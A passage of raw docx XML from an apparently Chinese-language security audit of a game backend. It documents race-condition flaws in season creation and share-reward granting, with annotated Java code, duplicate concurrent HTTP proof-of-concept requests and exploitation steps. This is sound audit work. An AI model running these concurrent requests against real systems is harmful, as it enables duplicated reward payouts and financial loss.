          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 由管理员直接配置（可为任意 BigDecimal），若奖励分发逻辑以赛季 ID 为维度触发，重复赛季可能引发重复发奖，奖损规模等于单赛季奖池金额乘以重复次数。</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入口：SeasonManageController.java</w:t>
              <w:br/>
              <w:t>// SeasonCreateRequest 可控字段：</w:t>
              <w:br/>
              <w:t>//   String seasonName;</w:t>
              <w:br/>
              <w:t>//   LocalDateTime startTime;   ← 攻击者控制赛季开始时间</w:t>
              <w:br/>
              <w:t>//   BigDecimal prizePoolAmount; ← 攻击者控制奖池金额</w:t>
              <w:br/>
              <w:t>@PostMapping("/create")</w:t>
              <w:br/>
              <w:t>public ApiResponse&lt;SeasonConfig&gt; create(@RequestBody SeasonCreateRequest req) { // ← HTTP 可控入口</w:t>
              <w:br/>
              <w:t xml:space="preserve">    SeasonConfig created = seasonManageService.create(req);  // ← 污点传入 service 层</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return ApiResponse.success(created);</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ② Service：SeasonManageService.java</w:t>
              <w:br/>
              <w:t>@Transactional  // ← 默认 READ_COMMITTED，不阻止并发幻读</w:t>
              <w:br/>
              <w:t>public SeasonConfig create(SeasonCreateRequest req) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    // ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">    LocalDateTime newStart = req.getStartTime();           // ← 污点：用户可控时间</w:t>
              <w:br/>
              <w:t xml:space="preserve">    LocalDateTime newEnd = newStart.plusDays(SEASON_DAYS - 1);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    for (SeasonConfig existing : seasonConfigRepository.findAllByOrderByStartTimeAsc()) { // ← T1/T2 并发读到相同快照</w:t>
              <w:br/>
              <w:t xml:space="preserve">        if (overlaps(newStart, newEnd, existing.getStartTime(), existing.getEndTime())) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">            throw new IllegalArgumentException("赛季时间与已有赛季 \"" + existing.getSeasonName() + "\" 重叠或包含，请调整开始时间");</w:t>
              <w:br/>
              <w:t xml:space="preserve">        }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    // ↑ T1 通过校验、T2 也通过校验（两者均未看到对方写入）</w:t>
              <w:br/>
              <w:t xml:space="preserve">    SeasonConfig s = new SeasonConfig();</w:t>
              <w:br/>
              <w:t xml:space="preserve">    s.setStartTime(newStart);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    s.setEndTime(newEnd);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    s.setPrizePoolAmount(req.getPrizePoolAmount() != null ? req.getPrizePoolAmount() : BigDecimal.ZERO); // ← 负数/零均可存入</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return seasonConfigRepository.save(s);  // ← T1/T2 各自提交，形成重叠赛季</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ③ 时间重叠校验：SeasonManageService.java</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">private boolean overlaps(LocalDateTime aStart, LocalDateTime aEnd, LocalDateTime bStart, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>LocalDateTime bEnd) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return aStart.isBefore(bEnd) &amp;&amp; bStart.isBefore(aEnd); // ← 纯内存校验，无锁保护</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并发发送两条完全相同的请求（可使用 Burp Suite Intruder 的 Turbo Intruder 或 curl 并发脚本）：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/seasonManage/create HTTP/1.1</w:t>
              <w:br/>
              <w:t>Host: &lt;target-host&gt;</w:t>
              <w:br/>
              <w:t>Content-Type: application/json</w:t>
              <w:br/>
              <w:t>Authorization: Bearer &lt;admin-token&gt;</w:t>
              <w:br/>
              <w:t>X-CSRF-Origin: &lt;合法来源&gt;</w:t>
              <w:br/>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>{"seasonName":"测试赛季","startTime":"2026-09-01T00:00:00","prizePoolAmount":100000}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>同时发送第二条（内容完全相同）：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/seasonManage/create HTTP/1.1</w:t>
              <w:br/>
              <w:t>Host: &lt;target-host&gt;</w:t>
              <w:br/>
              <w:t>Content-Type: application/json</w:t>
              <w:br/>
              <w:t>Authorization: Bearer &lt;admin-token&gt;</w:t>
              <w:br/>
              <w:t>X-CSRF-Origin: &lt;合法来源&gt;</w:t>
              <w:br/>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>{"seasonName":"测试赛季","startTime":"2026-09-01T00:00:00","prizePoolAmount":100000}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>📝 利用步骤：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="885"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">以合法管理员账号登录，获取 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>admin-token</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="886"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">使用并发工具（Burp Turbo Intruder / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>curl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 并发 / 压测脚本）同时发送上述两条请求，使两个事务的"读取已有赛季"操作在同一时刻完成（均未看到对方的写入）；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="887"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">两个事务均通过 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>overlaps</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 校验，各自执行 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>save</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，最终在数据库中写入两条 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>startTime=2026-09-01</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>endTime=2026-09-01+SEASON_DAYS-1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的重叠赛季记录；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="888"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>后续奖励分发逻辑若按赛季 ID 触发，将对相同用户群执行两次发奖，造成奖池金额双倍流出。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>⚠️ 权限要求：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="889"/>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890"/>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后台管理员</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">（需通过 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>AdminAuthFilter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 鉴权；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/seasonManage/**</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 已从 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>permitAll</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 移除，须经 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>.authenticated()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> + AdminAuthFilter 双重验证）</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891"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>SeasonManageController.java.create → SeasonManageService.java.create → SeasonManageService.java.overlaps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audit_m191_712_create_ctrl-path1of11.md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：ShareService.java#shareLevel3Success</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:name="heading_41" w:id="41"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>漏洞40：Level2/Level3 分享奖励发放 TOCTOU 竞态条件（FOR UPDATE 在无记录时失效）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="41"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="89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shareLevel3Success</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>shareLevel2Success</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 悲观锁防重机制在记录不存在时完全失效，并发请求可重复触发 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>updateProgress</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 刷奖励</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="89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src/main/java/com/gameBack/mjservice/service/ShareService.java:shareLevel3Success</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="89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89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89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897"/>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shareLevel3Success</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 和 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>shareLevel2Success</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 均使用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>findByInviterUserIdAndInviteeUserIdForUpdate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>SELECT ... FOR UPDATE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">）来序列化并发请求，意图防止重复调用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>taskExecutionService.updateProgress</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>。然而，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>SELECT ... FOR UPDATE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的悲观锁</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>只能锁定已存在的数据行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">——当 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>UserInvitationRecord</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 中尚不存在对应 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>(inviterUserId, inviteeUserId)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的记录时，该语句返回空，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>不会产生任何行锁</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此时两个并发事务 T1、T2 都会以 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>existingOpt.isEmpty()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 通过守卫条件，然后各自独立执行 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>taskExecutionService.updateProgress</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，导致任务进度被双计、道具奖励被双发。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>开发者在代码注释中已明确写出防护意图：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>// FOR UPDATE 防并发双请求重复 updateProgress</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，说明该漏洞正是已知威胁模型下的防护实现缺陷，而非未曾考虑的场景。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>对比：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>applyDailyOrLevel1Share</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 通过 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>userRepository.findByIdForUpdate(inviterUserId)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 锁定</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>始终存在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>的 User 行来序列化并发，保护是完整的；而 level2/level3 路径没有任何用户级锁，仅依赖可能为空的邀请记录行锁，保护存在根本性漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="89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POST /api/share/complete</w:t>
              <w:br/>
              <w:t xml:space="preserve">    TokenAuthFilter（Bearer token 校验 → userId 来自 Token，不可伪造）</w:t>
              <w:br/>
              <w:t xml:space="preserve">    SignAuthTestFilter（路径 /api/share/** 需 sign 校验）</w:t>
              <w:br/>
              <w:t xml:space="preserve">      ↓</w:t>
              <w:br/>
              <w:t xml:space="preserve">  ShareController.shareComplete(userId, form)</w:t>
              <w:br/>
              <w:t xml:space="preserve">    → shareService.shareComplete(userId, inviteeUserId, "level3")</w:t>
              <w:br/>
              <w:t xml:space="preserve">        → shareLevel3Success(inviterUserId, inviteeUserId)  ← 无用户级行锁</w:t>
              <w:br/>
              <w:t xml:space="preserve">            → findByInviterUserIdAndInviteeUserIdForUpdate(...)  ← 行不存在时不产生锁</w:t>
              <w:br/>
              <w:t xml:space="preserve">            ← 两并发事务均得到 Optional.empty()，均通过守卫</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">            → taskExecutionService.updateProgress(inviterUserId, "3", 1)  ← 被调用两次</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>shareLevel2Success</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 存在完全相同的路径（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
